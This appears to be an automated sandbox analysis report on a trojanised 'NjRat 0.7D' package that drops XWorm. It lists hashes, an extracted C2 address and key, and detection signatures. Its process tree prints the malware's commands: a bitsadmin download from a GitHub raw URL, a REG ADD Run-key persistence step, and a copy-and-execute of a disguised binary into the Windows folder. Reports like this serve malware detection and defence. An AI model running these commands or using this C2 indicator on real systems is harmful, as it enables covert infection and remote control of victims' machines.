Analysis
-
max time kernel
147s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
09-08-2024 10:24
Behavioral task
behavioral1
Sample
NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
Resource
win7-20240708-en
General
-
Target
NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
-
Size
8.9MB
-
MD5
3e8dc9ba82863bd3c1e5ec769d2c187f
-
SHA1
fa80a09b2a6804868c26dbeb62b073d1546a132b
-
SHA256
6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880
-
SHA512
10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c
-
SSDEEP
196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm
Malware Config
Extracted
xworm
83.143.112.30:3096
Dza3YLL2q2qcgzdH
Signatures
-
Detect Xworm Payload 5 IoCs
Processes:
resource yara_rule behavioral1/memory/496-37-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm behavioral1/memory/496-39-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm behavioral1/memory/496-42-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm behavioral1/memory/496-44-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm behavioral1/memory/496-43-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Executes dropped EXE 5 IoCs
Processes:
NjRat 0.7D.exeaudiodg.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeWatchDog.exepid process 2440 NjRat 0.7D.exe 3060 audiodg.exe 1944 Isolation graphique de périphérique audio Windows .exe 2316 WatchDog.exe 1728 WatchDog.exe -
Loads dropped DLL 2 IoCs
Processes:
Isolation graphique de périphérique audio Windows .exeWatchDog.exepid process 1944 Isolation graphique de périphérique audio Windows .exe 2316 WatchDog.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3551809350-4263495960-1443967649-1000\Software\Microsoft\Windows\CurrentVersion\Run\audiodg = "C:\\Windows\\Isolation graphique de périphérique audio Windows .exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Isolation graphique de périphérique audio Windows .exedescription pid process target process PID 1944 set thread context of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\Isolation graphique de périphérique audio Windows .exe cmd.exe File opened for modification C:\Windows\Isolation graphique de périphérique audio Windows .exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
audiodg.execmd.exePING.EXEreg.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeWatchDog.exeNjRat 0.7D.execmd.exePING.EXEPING.EXEInstallUtil.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language audiodg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Isolation graphique de périphérique audio Windows .exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WatchDog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WatchDog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NjRat 0.7D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEcmd.exePING.EXEPING.EXEpid process 2896 cmd.exe 2708 PING.EXE 1160 cmd.exe 2576 PING.EXE 2000 PING.EXE -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 2708 PING.EXE 2576 PING.EXE 2000 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
InstallUtil.exepid process 496 InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
Processes:
audiodg.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeWatchDog.exepid process 3060 audiodg.exe 3060 audiodg.exe 3060 audiodg.exe 3060 audiodg.exe 3060 audiodg.exe 3060 audiodg.exe 1944 Isolation graphique de périphérique audio Windows .exe 1944 Isolation graphique de périphérique audio Windows .exe 1944 Isolation graphique de périphérique audio Windows .exe 1944 Isolation graphique de périphérique audio Windows .exe 2316 WatchDog.exe 1728 WatchDog.exe 1728 WatchDog.exe 1728 WatchDog.exe 1944 Isolation graphique de périphérique audio Windows .exe 1944 Isolation graphique de périphérique audio Windows .exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
audiodg.exeIsolation graphique de périphérique audio Windows .exeInstallUtil.exeWatchDog.exeWatchDog.exedescription pid process Token: SeDebugPrivilege 3060 audiodg.exe Token: SeDebugPrivilege 1944 Isolation graphique de périphérique audio Windows .exe Token: SeDebugPrivilege 496 InstallUtil.exe Token: SeDebugPrivilege 2316 WatchDog.exe Token: SeDebugPrivilege 1728 WatchDog.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NjRat 0.7D.exepid process 2440 NjRat 0.7D.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
NjRat 0.7D.exepid process 2440 NjRat 0.7D.exe -
Suspicious use of WriteProcessMemory 62 IoCs
Processes:
NjRat 0.7D.exeWScript.exeaudiodg.execmd.execmd.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exedescription pid process target process PID 784 wrote to memory of 2440 784 NjRat 0.7D.exe NjRat 0.7D.exe PID 784 wrote to memory of 2440 784 NjRat 0.7D.exe NjRat 0.7D.exe PID 784 wrote to memory of 2440 784 NjRat 0.7D.exe NjRat 0.7D.exe PID 784 wrote to memory of 2440 784 NjRat 0.7D.exe NjRat 0.7D.exe PID 784 wrote to memory of 1920 784 NjRat 0.7D.exe WScript.exe PID 784 wrote to memory of 1920 784 NjRat 0.7D.exe WScript.exe PID 784 wrote to memory of 1920 784 NjRat 0.7D.exe WScript.exe PID 784 wrote to memory of 3060 784 NjRat 0.7D.exe audiodg.exe PID 784 wrote to memory of 3060 784 NjRat 0.7D.exe audiodg.exe PID 784 wrote to memory of 3060 784 NjRat 0.7D.exe audiodg.exe PID 784 wrote to memory of 3060 784 NjRat 0.7D.exe audiodg.exe PID 1920 wrote to memory of 2696 1920 WScript.exe bitsadmin.exe PID 1920 wrote to memory of 2696 1920 WScript.exe bitsadmin.exe PID 1920 wrote to memory of 2696 1920 WScript.exe bitsadmin.exe PID 3060 wrote to memory of 2896 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 2896 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 2896 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 2896 3060 audiodg.exe cmd.exe PID 2896 wrote to memory of 2708 2896 cmd.exe PING.EXE PID 2896 wrote to memory of 2708 2896 cmd.exe PING.EXE PID 2896 wrote to memory of 2708 2896 cmd.exe PING.EXE PID 2896 wrote to memory of 2708 2896 cmd.exe PING.EXE PID 3060 wrote to memory of 1160 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 1160 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 1160 3060 audiodg.exe cmd.exe PID 3060 wrote to memory of 1160 3060 audiodg.exe cmd.exe PID 1160 wrote to memory of 2576 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2576 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2576 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2576 1160 cmd.exe PING.EXE PID 2896 wrote to memory of 2100 2896 cmd.exe reg.exe PID 2896 wrote to memory of 2100 2896 cmd.exe reg.exe PID 2896 wrote to memory of 2100 2896 cmd.exe reg.exe PID 2896 wrote to memory of 2100 2896 cmd.exe reg.exe PID 1160 wrote to memory of 2000 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2000 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2000 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 2000 1160 cmd.exe PING.EXE PID 1160 wrote to memory of 1944 1160 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1160 wrote to memory of 1944 1160 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1160 wrote to memory of 1944 1160 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1160 wrote to memory of 1944 1160 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 496 1944 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 1944 wrote to memory of 2316 1944 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 1944 wrote to memory of 2316 1944 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 1944 wrote to memory of 2316 1944 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 1944 wrote to memory of 2316 1944 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 2316 wrote to memory of 1728 2316 WatchDog.exe WatchDog.exe PID 2316 wrote to memory of 1728 2316 WatchDog.exe WatchDog.exe PID 2316 wrote to memory of 1728 2316 WatchDog.exe WatchDog.exe PID 2316 wrote to memory of 1728 2316 WatchDog.exe WatchDog.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2440 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"2⤵
- Suspicious use of WriteProcessMemory
PID:1920 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar3⤵
- Download via BitsAdmin
PID:2696 -
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2896 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 84⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2708 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:2100 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 13 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 13 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1160 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 134⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2576 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 134⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2000 -
C:\Windows\Isolation graphique de périphérique audio Windows .exe"C:\Windows\Isolation graphique de périphérique audio Windows .exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:496 -
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2316 -
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1728
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8.5MB
MD570ea9c044c9a766330d3fe77418244a5
SHA118602d0db52917b88cbdab84ba89181e6fd4686a
SHA256b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5
SHA5125261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917
-
Filesize
78B
MD5d8d402e89dfd0d68ef74f1e5eb908783
SHA1f1316ea2a1ab57d60c3778dd568f558842a0ad59
SHA2569d5cc20e40bddf63d32620611667ddc3d9cbfacc5a4f10aeddc533822a0819cd
SHA512790e8d9b23ff6981e4e7fed1ea5cd18aab23ce8ac731c974df88d2e433d27331f28e12a187cf114ddbaf513acea3c4cb1a2dbfa1ed226a884b707915adf894b4
-
Filesize
81B
MD5aa2ba3f6b3c72fb0d31377de02638170
SHA1a2eb4f466a4b312c014c39cd7537b3da6f113561
SHA2564b9e8ff63430de858de9fc7e51f32500b6f7c235fea9de777481ef590eafb607
SHA512e5665bbf169432c1128149fbcd831ea9e27185be32c4548e919d66e4f642f0ca11ce29d2d6aa3cfe3c55420d159b47db483115f0e99ee2379e9904f7f1f163df
-
Filesize
355KB
MD5d9dfa8ba182529445890b5021e159b77
SHA164f8724f8cd76adff12364e6bb2fc9eaceadb1ba
SHA25660df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f
SHA512d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803
-
Filesize
19KB
MD54724c9dce57bc0472ed610ba16d08894
SHA1d5fea3520146ccbf54c31b3b4868de499022fb37
SHA256aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb
SHA512d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18
-
Filesize
76KB
MD50e362e7005823d0bec3719b902ed6d62
SHA1590d860b909804349e0cdc2f1662b37bd62f7463
SHA2562d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3